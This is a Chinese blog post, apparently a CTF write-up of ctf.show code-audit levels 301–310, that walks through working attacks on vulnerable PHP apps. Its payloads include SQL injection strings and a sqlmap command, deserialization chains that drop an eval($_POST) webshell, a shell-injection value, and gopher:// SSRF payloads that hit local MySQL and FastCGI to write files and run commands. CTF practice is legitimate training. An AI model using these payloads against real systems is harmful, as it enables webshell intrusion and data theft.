ctf_show笔记篇(web入门---代码审计)

已于 2024-03-18 09:20:23 修改
阅读量1.3k 收藏 22
点赞数 16
分类专栏: ctf.show web题 文章标签: ctf ctfshow php代码审计 反序列化 ssrf
于 2024-03-13 09:31:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/136615721
版权

目录

301:多种方式进入

302:和301同理

303:  会判断传入的username长度了其余不变

304:  增加了全局变量其他与303无差异

305:  存在反序列化漏洞

306:  反序列化

307:  

308:  SSRF漏洞

309:依旧利用ssrf漏洞,  这一次需要打fastcgi

310:  

301:多种方式进入

  1. 从index.php页面来看
    只需要访问index.php时session[login]不为空就能访问

    那么就在访问index.php的时候上传login = 随机一个东西就能进去
  2. 从checklogin页面来看sql注入没有任何过滤
    直接联合绕过

    密码随意

还有多种方式可以自己去看代码分析

302:和301同理

只是添加了一个,strcasecmp对比两个有什么区别,不区分大小写,相同输出0

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

还将密码加密了一下,给'union select ??   这里的'问好'像下面一样加密一下

在传入未加密的数字

例如: 1234 加密以后3cd76fc2201d6959a8c1c63dbd906ec7

和301同样的解法

也是同样可以使用直接访问index.php然后传入session[login]=任意一个东西,只要不为空

303:  会判断传入的username长度了其余不变

这里尝试弱口令

密码admin

账户admin

这里再dpt页面找到数据传输位置

这里会将传输数据给到aptadd文件

这里的数据执行insert命令插入到数据表里

$sql="insert into sds_dpt set sds_name='".$dpt_name."',
sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',
sds_have_safe_card='".$dpt_has_cert."',
sds_safe_card_num='".$dpt_cert_number."',
sds_telephone='".$dpt_telephone_number."';";

这里利用报错注入

payload:

'and(select updatexml(1,concat(0x7e,(select substr(group_concat(flag),30,45) from sds_fl9g),0x7e),1))#

304:  增加了全局变量其他与303无差异

function sds_waf($str){
	return preg_match('/[0-9]|[a-z]|-/i', $str);
}

payload:

'and(select updatexml(1,concat(0x7e,(select substr(group_concat(flag)from sds_flaag,1,20)),0x7e),1))#

也可拿到sqlmap里去跑

1.txt文件内容

POST /dptadd.php HTTP/1.1
Host: e22b9690-cfab-425c-9cb7-2f9f6b750c26.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: http://e22b9690-cfab-425c-9cb7-2f9f6b750c26.challenge.ctf.show
Connection: close
Referer: http://e22b9690-cfab-425c-9cb7-2f9f6b750c26.challenge.ctf.show/dpt.php
Cookie: PHPSESSID=l16so97igh43ejc1g0gua2bffn
Upgrade-Insecure-Requests: 1

dpt_name=sd&dpt_address=ad&dpt_build_year=2024-03-06&dpt_has_cert=on&dpt_cert_number=sda&dpt_telephone_number=ad

sqlmap -r 1.txt --batch -D sds -T sds_flaag -C flag --dump

305:  存在反序列化漏洞

利用到file_put_contents可以写入shell

通过user传入,再用蚁剑连接数据库获得flag

306:  反序列化

从代码层面看,  最后是要利用到

class.php文件

现在开始反推,  去找哪里用到了close函数

在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数),  这里就要用到__construct魔法函数,  当执行new实例化的时候就会调用,  一会儿再去找哪里实例化了dao这个类,  将$this->config=new config()修改为$this->conn->=apt()

现在再去找哪里用new实例化了dao类

从这里嗯呢看到service.php文件里的__construct调用了new实例化dao

payload:

<?php
class log{
	public $title='1.php';
	public $info='<?php eval($_POST[a]);?>';
}

class dao{
	private $config;
	private $conn;

	public function __construct(){
		$this->conn=new log();
	}
}



echo base64_encode(serialize(new dao));

307:  

从这里看依旧时反序列化

login.php

这里本还是想调用这里的奈何没有嗲用点

不过好在在dao.php文件看到了执行命令的函数

这里$this->config->cache_dir指向了config类里的cache_dir变量,  刚好又是个public公共便变量可以修改

并且server.php也找到了执行此函数的地方

payload:

class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}

class config{
	public $cache_dir = ';echo \'<?php eval(\$_POST[a]);?>\' > 1.php;';
}

echo base64_encode(serialize(new config));

308:  SSRF漏洞

这里本来还是想在cache_dir做文章使用命令,奈何这里设置了白名单,  只能使用字母

但好在这里还存在ssrf漏洞

这里还能知道数据库密码为空,那么可以直接使用root用户登录

这里利用Gopherus生成对mysql的ssrf注入

这里注意,传入点在index.php

payload:(使用gopherus的mysql执行命令有条件,  不能有密码)

<?php
class config{
	public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%61%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo base64_encode(serialize($a));
?>

309:依旧利用ssrf漏洞,  这一次需要打fastcgi

还是利用gopherus生成fastcgi的payload

poc:

<?php
class config{
	public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo base64_encode(serialize($a));
?>

310:  

9000端口和6379端口都关了,  得做信息收集,通过field://协议访问本地文件

<?php
class config{
	public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo base64_encode(serialize($a));
?>

这里从返回信息来看,  在监听4476端口flag在var里面

直接去访问获取flag

<?php
class config{
	public $update_url = 'http://127.0.0.1:4476';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
echo base64_encode(serialize(new dao));
?>

怪兽不会rap_哥哥我会crash
关注
专栏目录
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTFShow Web入门_爆破
qq_19533763的博客
04-01 1190
Web21 随便输入抓包 发现Base64加密 账号和密码用:隔开 使用BP构造payload爆破 下载官方提供的字典 把后缀名改为.zip即可打开 使用Custom iterator模式 第一部分 第二部分 第三部分使用字典 添加base64加密 关闭url编码 爆破完按length排序查看最小的回包 Web22 子域名爆破,爆破ctf.show 最终在vip.ctf.show的源码发现了flag Web23 error_reporting(0); include('fla
CTF-PHP代码审计学习笔记分享
m0_62945162的博客
06-12 1454
CTF学习笔记分享-PHP代码审计。自己总结,若有错误,请联系改正,谢谢!
[CTF夺旗赛] CTFshow Web1-12 详细过程保姆级教程~
最新发布
Da1NtY的博客
09-09 2600
CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解题思路的在线社区或软件。参与者会在比赛中收集“flag”,通常是隐藏在网络环境中的数据或密码形式,然后通过分析、破解等手段找到并提交。CTFShow可以帮助人们了解最新的安全技术和挑战,同时也促进了安全知识和技术的交流。
CTF练习——代码审计
HasntStartIsOver的博客
06-04 846
页面无返回值,也没有报错。说明通过了所有拦截,但是文件不存在或者是空白的。在source.php中展示了源代码,下面进行源码分析。源码中注释了source.php,直接访问该页面。一次尝试 payload =,最后获得flag。
ctfshow代码审计
qq_61768489的博客
01-26 1484
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上题一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问题的,因为sql语句依旧是正常执行了。似乎没有调用,与上题一样,换一种方式,有报错信息就试试报错注入。
CTF-代码审计-PHP
m0_74317362的博客
09-25 357
将代码复制到everedit中,可以看到乱码。要传参的变量名及其值都变了。
小白刷题CTF show web方向,满满干货指导
m0_63174529的博客
04-09 362
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!一些笔者自己买的、其他平台白嫖不到的视频教程。
可编程控制器_S7-1500_S7-1500编程入门_
10-01
将详细讲解S7-1500的编程入门知识,包括系统组态、编程、选型和调试。 首先,了解S7-1500的基础架构至关重要。S7-1500系统由中央处理器(CPU)、输入/输出模块(I/O模块)、电源模块、通信模块等组成,可以根据...
ctf_walkthrough:捕获标志-演练
02-15
夺旗-演练在“捕获标志”(CTF)中,“标志”是隐藏在有目的漏洞的程序或网站中的秘密。 参赛者从其他参赛者(进攻/防守风格的CTF)或组织者那里窃取旗帜。 存在几种变体,包括在硬件设备中隐藏标志。 安全CTF通常被...
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
ctfshow web入门代码审计 web301-305
m0_62207170的博客
04-20 508
ctfshow web入门代码审计 web301-305
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 753
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
CTFshow--Web--代码审计
pwfortune的博客
07-29 1130
service/service.php , 也存在 clearCache()的调用, 而且在logout.php里面require了service.php,查询不到内容, 会在数据库中创建一个数据 123 , 那么这个123就会作为一个返回的数据, 用以跟用户输入的密码进行比较 , 相匹配的话就行登录进去了。在index.php下面 ,能够调用 checkVersion()函数 , 虽然header 头跳转了,但是还是会执行后面的代码。向服务端发送请求时,服务端会等待我们发送数据,处于wait状态。
CTFshow—代码审计 web301-310
cht6667的博客
02-23 1051
CTFshow代码审计部分个人做题记录
CTFshow 1-10关
weixin_62369433的博客
11-11 2275
CTFshow 1-10 通关详解
ctfshow(菜狗杯)
qq_62046696的博客
11-28 5891
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
CTF show----web 解题笔记web签到~web6)
weixin_45908624的博客
11-22 4045
web签到~web6 解题笔记
ctfshow web入门 代码审计
12-10
Web安全中的代码审计是指对Web应用程序的源代码进行分析,以查找潜在的漏洞和安全问题。CTF比赛中的Web入门题目通常是一些简单的Web应用程序,可以通过代码审计来发现漏洞并获取flag。 以下是一些常见的Web漏洞和审计技巧: 1. SQL注入:通过构造恶意的SQL语句来绕过应用程序的身份验证和访问控制。可以通过查找应用程序中的SQL查询语句和参数化查询来发现SQL注入漏洞。 2. XSS(跨站脚本攻击):通过在Web页面中注入恶意脚本来窃取用户信息或执行其他恶意操作。可以通过查找应用程序中的用户输入和输出来发现XSS漏洞。 3. 文件包含漏洞:通过包含恶意文件来执行任意代码。可以通过查找应用程序中的文件包含函数和参数来发现文件包含漏洞。 4. SSRF(服务器端请求伪造):通过构造恶意的请求来访问应用程序不应该访问的资源。可以通过查找应用程序中的网络请求和参数来发现SSRF漏洞。 5. 逻辑漏洞:通过利用应用程序中的逻辑错误来绕过身份验证和访问控制。可以通过仔细分析应用程序的代码和业务逻辑来发现逻辑漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值